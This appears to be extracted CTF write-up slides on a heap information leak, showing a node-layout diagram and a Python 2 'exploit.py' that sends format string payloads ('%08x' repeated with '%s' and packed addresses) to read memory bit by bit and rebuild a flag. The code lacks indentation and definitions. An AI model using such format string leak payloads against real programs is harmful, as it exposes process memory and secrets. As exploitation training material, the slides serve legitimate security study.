14. Information Leakage
• Using format string bug
Leaf
Flag = 0x49
0
Child
Leaf
Flag = 0x49
Child
0
Leaf
Flag = 0x49
Child
0
zero or not
0x49 or 0x4C
…
Given address
Given address
+0x18 (size of leaf)
+0x08 (size of chunk header)
Given address
+ 0x40
zero or not
0x49 or 0x4C
zero or not
0x49 or 0x4C
15. exploit.py
flag = ""
flag_next = ""
while flag_next != "L":
c = 0
for i in range(8):
c = c << 1
buf = '%08x' * 32
buf += ' !%s! '
buf += ' !%s! '
buf += pQ(addr)
buf += pQ(addr + 8)
f.write(pQ(len(buf)) + buf)
read_until(f, ' !')
flag_next = read_until(f, '! ')[:-3]
read_until(f, ' !')
child = read_until(f, '! ')[:-3]
if flag_next == 'L':
break
if child:
bit = 1
else:
bit = 0
print bit,
c += bit
addr += 0x20
else:
print ""
flag += chr(c)
print("[*] flag: %s" % flag)